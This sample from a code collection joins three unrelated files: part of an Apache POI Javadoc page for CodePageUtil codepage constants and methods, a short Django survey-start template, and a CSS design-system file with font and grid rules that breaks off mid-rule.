<h4>CP_MAC_THAI</h4> <pre>public static final&nbsp;int CP_MAC_THAI</pre> <div class="block"><p>Codepage for Macintosh Thai (Java: MacThai)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_THAI">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_CENTRAL_EUROPE"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MAC_CENTRAL_EUROPE</h4> <pre>public static final&nbsp;int CP_MAC_CENTRAL_EUROPE</pre> <div class="block"><p>Codepage for Macintosh Central Europe (Latin-2) (Java: MacCentralEurope)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_CENTRAL_EUROPE">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_ICELAND"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MAC_ICELAND</h4> <pre>public static final&nbsp;int CP_MAC_ICELAND</pre> <div class="block"><p>Codepage for Macintosh Iceland (Java: MacIceland)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_ICELAND">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_TURKISH"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MAC_TURKISH</h4> <pre>public static final&nbsp;int CP_MAC_TURKISH</pre> <div class="block"><p>Codepage for Macintosh Turkish (Java: MacTurkish)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_TURKISH">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_CROATIAN"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MAC_CROATIAN</h4> <pre>public static final&nbsp;int CP_MAC_CROATIAN</pre> <div class="block"><p>Codepage for Macintosh Croatian (Java: MacCroatian)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_CROATIAN">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_US_ACSII"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_US_ACSII</h4> <pre>public static final&nbsp;int CP_US_ACSII</pre> <div class="block"><p>Codepage for US-ASCII</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_US_ACSII">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_KOI8_R"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_KOI8_R</h4> <pre>public static final&nbsp;int CP_KOI8_R</pre> <div class="block"><p>Codepage for KOI8-R</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_KOI8_R">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_ISO_8859_1"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_ISO_8859_1</h4> <pre>public static final&nbsp;int CP_ISO_8859_1</pre> <div class="block"><p>Codepage for ISO-8859-1</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_ISO_8859_1">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_ISO_8859_2"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_ISO_8859_2</h4> <pre>public static final&nbsp;int CP_ISO_8859_2</pre> <div class="block"><p>Codepage for ISO-8859-2</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_ISO_8859_2">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_ISO_8859_3"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_ISO_8859_3</h4> <pre>public static final&nbsp;int CP_ISO_8859_3</pre> <div class="block"><p>Codepage for ISO-8859-3</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_ISO_8859_3">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_ISO_8859_4"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_ISO_8859_4</h4> <pre>public static final&nbsp;int CP_ISO_8859_4</pre> <div class="block"><p>Codepage for ISO-8859-4</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_ISO_8859_4">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_ISO_8859_5"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_ISO_8859_5</h4> <pre>public static final&nbsp;int CP_ISO_8859_5</pre> <div class="block"><p>Codepage for ISO-8859-5</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_ISO_8859_5">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_ISO_8859_6"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_ISO_8859_6</h4> <pre>public static final&nbsp;int CP_ISO_8859_6</pre> <div class="block"><p>Codepage for ISO-8859-6</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_ISO_8859_6">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_ISO_8859_7"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_ISO_8859_7</h4> <pre>public static final&nbsp;int CP_ISO_8859_7</pre> <div class="block"><p>Codepage for ISO-8859-7</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_ISO_8859_7">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_ISO_8859_8"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_ISO_8859_8</h4> <pre>public static final&nbsp;int CP_ISO_8859_8</pre> <div class="block"><p>Codepage for ISO-8859-8</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_ISO_8859_8">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_ISO_8859_9"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_ISO_8859_9</h4> <pre>public static final&nbsp;int CP_ISO_8859_9</pre> <div class="block"><p>Codepage for ISO-8859-9</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_ISO_8859_9">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_ISO_2022_JP1"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_ISO_2022_JP1</h4> <pre>public static final&nbsp;int CP_ISO_2022_JP1</pre> <div class="block"><p>Codepage for ISO-2022-JP</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_ISO_2022_JP1">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_ISO_2022_JP2"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_ISO_2022_JP2</h4> <pre>public static final&nbsp;int CP_ISO_2022_JP2</pre> <div class="block"><p>Another codepage for ISO-2022-JP</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_ISO_2022_JP2">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_ISO_2022_JP3"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_ISO_2022_JP3</h4> <pre>public static final&nbsp;int CP_ISO_2022_JP3</pre> <div class="block"><p>Yet another codepage for ISO-2022-JP</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_ISO_2022_JP3">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_ISO_2022_KR"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_ISO_2022_KR</h4> <pre>public static final&nbsp;int CP_ISO_2022_KR</pre> <div class="block"><p>Codepage for ISO-2022-KR</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_ISO_2022_KR">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_EUC_JP"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_EUC_JP</h4> <pre>public static final&nbsp;int CP_EUC_JP</pre> <div class="block"><p>Codepage for EUC-JP</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_EUC_JP">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_EUC_KR"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_EUC_KR</h4> <pre>public static final&nbsp;int CP_EUC_KR</pre> <div class="block"><p>Codepage for EUC-KR</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_EUC_KR">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_GB2312"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_GB2312</h4> <pre>public static final&nbsp;int CP_GB2312</pre> <div class="block"><p>Codepage for GB2312</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_GB2312">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_GB18030"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_GB18030</h4> <pre>public static final&nbsp;int CP_GB18030</pre> <div class="block"><p>Codepage for GB18030</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_GB18030">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_US_ASCII2"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_US_ASCII2</h4> <pre>public static final&nbsp;int CP_US_ASCII2</pre> <div class="block"><p>Another codepage for US-ASCII</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_US_ASCII2">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_UTF8"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_UTF8</h4> <pre>public static final&nbsp;int CP_UTF8</pre> <div class="block"><p>Codepage for UTF-8</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_UTF8">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_UNICODE"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>CP_UNICODE</h4> <pre>public static final&nbsp;int CP_UNICODE</pre> <div class="block"><p>Codepage for Unicode</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_UNICODE">Constant Field Values</a></dd></dl> </li> </ul> </li> </ul> <!-- ========= CONSTRUCTOR DETAIL ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor_detail"> <!-- --> </a> <h3>Constructor Detail</h3> <a name="CodePageUtil()"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>CodePageUtil</h4> <pre>public&nbsp;CodePageUtil()</pre> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method_detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="getBytesInCodePage(java.lang.String, int)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getBytesInCodePage</h4> <pre>public static&nbsp;byte[]&nbsp;getBytesInCodePage(java.lang.String&nbsp;string, int&nbsp;codepage) throws java.io.UnsupportedEncodingException</pre> <div class="block">Converts a string into bytes, in the equivalent character encoding to the supplied codepage number.</div> <dl><dt><span class="strong">Parameters:</span></dt><dd><code>string</code> - The string to convert</dd><dd><code>codepage</code> - The codepage number</dd> <dt><span class="strong">Throws:</span></dt> <dd><code>java.io.UnsupportedEncodingException</code></dd></dl> </li> </ul> <a name="getStringFromCodePage(byte[], int)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getStringFromCodePage</h4> <pre>public static&nbsp;java.lang.String&nbsp;getStringFromCodePage(byte[]&nbsp;string, int&nbsp;codepage) throws java.io.UnsupportedEncodingException</pre> <div class="block">Converts the bytes into a String, based on the equivalent character encoding to the supplied codepage number.</div> <dl><dt><span class="strong">Parameters:</span></dt><dd><code>string</code> - The byte of the string to convert</dd><dd><code>codepage</code> - The codepage number</dd> <dt><span class="strong">Throws:</span></dt> <dd><code>java.io.UnsupportedEncodingException</code></dd></dl> </li> </ul> <a name="getStringFromCodePage(byte[], int, int, int)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getStringFromCodePage</h4> <pre>public static&nbsp;java.lang.String&nbsp;getStringFromCodePage(byte[]&nbsp;string, int&nbsp;offset, int&nbsp;length, int&nbsp;codepage) throws java.io.UnsupportedEncodingException</pre> <div class="block">Converts the bytes into a String, based on the equivalent character encoding to the supplied codepage number.</div> <dl><dt><span class="strong">Parameters:</span></dt><dd><code>string</code> - The byte of the string to convert</dd><dd><code>codepage</code> - The codepage number</dd> <dt><span class="strong">Throws:</span></dt> <dd><code>java.io.UnsupportedEncodingException</code></dd></dl> </li> </ul> <a name="codepageToEncoding(int)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>codepageToEncoding</h4> <pre>public static&nbsp;java.lang.String&nbsp;codepageToEncoding(int&nbsp;codepage) throws java.io.UnsupportedEncodingException</pre> <div class="block"><p>Turns a codepage number into the equivalent character encoding's name (in Java NIO canonical naming format).</p></div> <dl><dt><span class="strong">Parameters:</span></dt><dd><code>codepage</code> - The codepage number</dd> <dt><span class="strong">Returns:</span></dt><dd>The character encoding's name. If the codepage number is 65001, the encoding name is "UTF-8". All other positive numbers are mapped to their Java NIO names, normally either "windows-" followed by the number, eg "windows-1251", or "cp" followed by the number, e.g. if the codepage number is 1252 the returned character encoding name will be "cp1252".</dd> <dt><span class="strong">Throws:</span></dt> <dd><code>java.io.UnsupportedEncodingException</code> - if the specified codepage is less than zero.</dd></dl> </li> </ul> <a name="codepageToEncoding(int, boolean)"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>codepageToEncoding</h4> <pre>public static&nbsp;java.lang.String&nbsp;codepageToEncoding(int&nbsp;codepage, boolean&nbsp;javaLangFormat) throws java.io.UnsupportedEncodingException</pre> <div class="block"><p>Turns a codepage number into the equivalent character encoding's name, in either Java NIO or Java Lang canonical naming.</p></div> <dl><dt><span class="strong">Parameters:</span></dt><dd><code>codepage</code> - The codepage number</dd><dd><code>javaLangFormat</code> - Should Java Lang or Java NIO naming be used?</dd> <dt><span class="strong">Returns:</span></dt><dd>The character encoding's name, in either Java Lang format (eg Cp1251, ISO8859_5) or Java NIO format (eg windows-1252, ISO-8859-9)</dd> <dt><span class="strong">Throws:</span></dt> <dd><code>java.io.UnsupportedEncodingException</code> - if the specified codepage is less than zero.</dd><dt><span class="strong">See Also:</span></dt><dd><a href="http://docs.oracle.com/javase/6/docs/technotes/guides/intl/encoding.doc.html">Supported Encodings</a></dd></dl> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/CodePageUtil.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../org/apache/poi/util/CloseIgnoringInputStream.html" title="class in org.apache.poi.util"><span class="strong">Prev Class</span></a></li> <li><a href="../../../../org/apache/poi/util/CommonsLogger.html" title="class in org.apache.poi.util"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/apache/poi/util/CodePageUtil.html" target="_top">Frames</a></li> <li><a href="CodePageUtil.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#field_summary">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor_summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#field_detail">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor_detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small> <i>Copyright 2014 The Apache Software Foundation or its licensors, as applicable.</i> </small></p> </body> </html>
envconnect/templates/survey/response_form.html
djaodjin/envconnect
{% extends "base.html" %} {% block content %} <div class="container"> <h1>Welcome to {{campaign.name|title}}</h1> <div> {{campaign.description|safe}} </div> <div> {% if campaign.published %} <form method="post" action="."> {% csrf_token %} <div class="form-actions text-center"> <input type="submit" name="submit" value="Start" class="btn btn-primary" id="submit-id-submit"> </div> </form> {% else %} <em>Sorry, this {% if campaign.quizz_mode %}quizz{% else %}campaign{% endif %} is no longer available. Thank you.</em> {% endif %} </div> </div> {% endblock %}
docs/checkboxes/2.0.1/tests/BOM/assets/css/gui.css
WestpacCXTeam/GUI-source
/*! _colors v2.0.1 */ /* * SETTINGS */ .written-by { content: 'Dominik Wilkowski, Justin Spencer, Kate T MacDonald, Marita Purins, Daphne Bourne'; color: #BADA55; } /*! _fonts v2.0.1 */ /* * SETTINGS */ /* * SETTINGS */ @font-face { font-family: 'stag'; src: url('../font/Stag-Light.eot'); src: url('../font/Stag-Light.eot?#iefix') format('embedded-opentype'), url('../font/Stag-Light.woff') format('woff'), url('../font/Stag-Light.ttf') format('truetype'), url('../font/Stag-Light.svg#Stag-Light') format('svg'); font-weight: 300; font-style: normal; } @font-face { font-family: 'stag'; src: url('../font/Stag-Medium.eot'); src: url('../font/Stag-Medium.eot?#iefix') format('embedded-opentype'), url('../font/Stag-Medium.woff') format('woff'), url('../font/Stag-Medium.ttf') format('truetype'), url('../font/Stag-Medium.svg#Stag-Medium') format('svg'); font-weight: 500; font-style: normal; } .body-font { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; } .brand-font { font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; } /*! _grid v2.0.0 */ .clearfix:before, .clearfix:after, .container-fluid:before, .container-fluid:after, .container:before, .container:after, .row:before, .row:after, .checkbox:before, .checkbox:after { content: " "; display: table; } .clearfix:after, .container-fluid:after, .container:after, .row:after, .checkbox:after { clear: both; } *, *:after, *:before { box-sizing: border-box; } .container, .container-fluid { margin-right: auto; margin-left: auto; padding-left: 12px; padding-right: 12px; } @media (min-width: 768px) { .container { padding-left: 12px; padding-right: 12px; } } @media (min-width: 992px) { .container { padding-left: 12px; padding-right: 12px; } } @media (min-width: 1200px) { .container { padding-left: 12px; padding-right: 12px; } } @media (min-width: 768px) { .container { width: 744px; } } @media (min-width: 992px) { .container { width: 960px; } } @media (min-width: 1200px) { .container { width: 1164px; } } @media (min-width: 768px) { .container-fluid { padding-left: 12px; padding-right: 12px; } } @media (min-width: 992px) { .container-fluid { padding-left: 12px; padding-right: 12px; } } @media (min-width: 1200px) { .container-fluid { padding-left: 12px; padding-right: 12px; } } .row { margin-left: -6px; margin-right: -6px; } @media (min-width: 768px) { .row { margin-left: -12px; margin-right: -12px; } } @media (min-width: 992px) { .row { margin-left: -12px; margin-right: -12px; } } @media (min-width: 1200px) { .row { margin-left: -12px; margin-right: -12px; } } .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { position: relative; min-height: 1px; padding-left: 6px; padding-right: 6px; } @media (min-width: 768px) { .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { padding-left: 12px; padding-right: 12px; } } @media (min-width: 992px) { .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { padding-left: 12px; padding-right: 12px; } } @media (min-width: 1200px) { .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { padding-left: 12px; padding-right: 12px; } } .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { float: left; } .col-xs-12 { width: 100%; } .col-xs-11 { width: 91.66666667%; } .col-xs-10 { width: 83.33333333%; } .col-xs-9 { width: 75%; } .col-xs-8 { width: 66.66666667%; } .col-xs-7 { width: 58.33333333%; } .col-xs-6 { width: 50%; } .col-xs-5 { width: 41.66666667%; } .col-xs-4 { width: 33.33333333%; } .col-xs-3 { width: 25%; } .col-xs-2 { width: 16.66666667%; } .col-xs-1 { width: 8.33333333%; } .col-xs-pull-12 { right: 100%; } .col-xs-pull-11 { right: 91.66666667%; } .col-xs-pull-10 { right: 83.33333333%; } .col-xs-pull-9 { right: 75%; } .col-xs-pull-8 { right: 66.66666667%; } .col-xs-pull-7 { right: 58.33333333%; } .col-xs-pull-6 { right: 50%; } .col-xs-pull-5 { right: 41.66666667%; } .col-xs-pull-4 { right: 33.33333333%; } .col-xs-pull-3 { right: 25%; } .col-xs-pull-2 { right: 16.66666667%; } .col-xs-pull-1 { right: 8.33333333%; } .col-xs-pull-0 { right: auto; } .col-xs-push-12 { left: 100%; } .col-xs-push-11 { left: 91.66666667%; } .col-xs-push-10 { left: 83.33333333%; } .col-xs-push-9 { left: 75%; } .col-xs-push-8 { left: 66.66666667%; } .col-xs-push-7 { left: 58.33333333%; } .col-xs-push-6 { left: 50%; } .col-xs-push-5 { left: 41.66666667%; } .col-xs-push-4 { left: 33.33333333%; } .col-xs-push-3 { left: 25%; } .col-xs-push-2 { left: 16.66666667%; } .col-xs-push-1 { left: 8.33333333%; } .col-xs-push-0 { left: auto; } .col-xs-offset-12 { margin-left: 100%; } .col-xs-offset-11 { margin-left: 91.66666667%; } .col-xs-offset-10 { margin-left: 83.33333333%; } .col-xs-offset-9 { margin-left: 75%; } .col-xs-offset-8 { margin-left: 66.66666667%; } .col-xs-offset-7 { margin-left: 58.33333333%; } .col-xs-offset-6 { margin-left: 50%; } .col-xs-offset-5 { margin-left: 41.66666667%; } .col-xs-offset-4 { margin-left: 33.33333333%; } .col-xs-offset-3 { margin-left: 25%; } .col-xs-offset-2 { margin-left: 16.66666667%; } .col-xs-offset-1 { margin-left: 8.33333333%; } .col-xs-offset-0 { margin-left: 0; } @media (min-width: 768px) { .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9 { float: left; } .col-sm-12 { width: 100%; } .col-sm-11 { width: 91.66666667%; } .col-sm-10 { width: 83.33333333%; } .col-sm-9 { width: 75%; } .col-sm-8 { width: 66.66666667%; } .col-sm-7 { width: 58.33333333%; } .col-sm-6 { width: 50%; } .col-sm-5 { width: 41.66666667%; } .col-sm-4 { width: 33.33333333%; } .col-sm-3 { width: 25%; } .col-sm-2 { width: 16.66666667%; } .col-sm-1 { width: 8.33333333%; } .col-sm-pull-12 { right: 100%; } .col-sm-pull-11 { right: 91.66666667%; } .col-sm-pull-10 { right: 83.33333333%; } .col-sm-pull-9 { right: 75%; } .col-sm-pull-8 { right: 66.66666667%; } .col-sm-pull-7 { right: 58.33333333%; } .col-sm-pull-6 { right: 50%; } .col-sm-pull-5 { right: 41.66666667%; } .col-sm-pull-4 { right: 33.33333333%; } .col-sm-pull-3 { right: 25%; } .col-sm-pull-2 { right: 16.66666667%; } .col-sm-pull-1 { right: 8.33333333%; } .col-sm-pull-0 { right: auto; } .col-sm-push-12 { left: 100%; } .col-sm-push-11 { left: 91.66666667%; } .col-sm-push-10 { left: 83.33333333%; } .col-sm-push-9 { left: 75%; } .col-sm-push-8 { left: 66.66666667%; } .col-sm-push-7 { left: 58.33333333%; } .col-sm-push-6 { left: 50%; } .col-sm-push-5 { left: 41.66666667%; } .col-sm-push-4 { left: 33.33333333%; } .col-sm-push-3 { left: 25%; } .col-sm-push-2 { left: 16.66666667%; } .col-sm-push-1 { left: 8.33333333%; } .col-sm-push-0 { left: auto; } .col-sm-offset-12 { margin-left: 100%; } .col-sm-offset-11 { margin-left: 91.66666667%; } .col-sm-offset-10 { margin-left: 83.33333333%; } .col-sm-offset-9 { margin-left: 75%; } .col-sm-offset-8 { margin-left: 66.66666667%; } .col-sm-offset-7 { margin-left: 58.33333333%; } .col-sm-offset-6 { margin-left: 50%; } .col-sm-offset-5 { margin-left: 41.66666667%; } .col-sm-offset-4 { margin-left: 33.33333333%; } .col-sm-offset-3 { margin-left: 25%; } .col-sm-offset-2 { margin-left: 16.66666667%; } .col-sm-offset-1 { margin-left: 8.33333333%; } .col-sm-offset-0 { margin-left: 0; } } @media (min-width: 992px) { .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9 { float: left; } .col-md-12 { width: 100%; } .col-md-11 { width: 91.66666667%; } .col-md-10 { width: 83.33333333%; } .col-md-9 { width: 75%; } .col-md-8 { width: 66.66666667%; } .col-md-7 { width: 58.33333333%; } .col-md-6 { width: 50%; } .col-md-5 { width: 41.66666667%; } .col-md-4 { width: 33.33333333%; } .col-md-3 { width: 25%; } .col-md-2 { width: 16.66666667%; } .col-md-1 { width: 8.33333333%; } .col-md-pull-12 { right: 100%; } .col-md-pull-11 { right: 91.66666667%; } .col-md-pull-10 { right: 83.33333333%; } 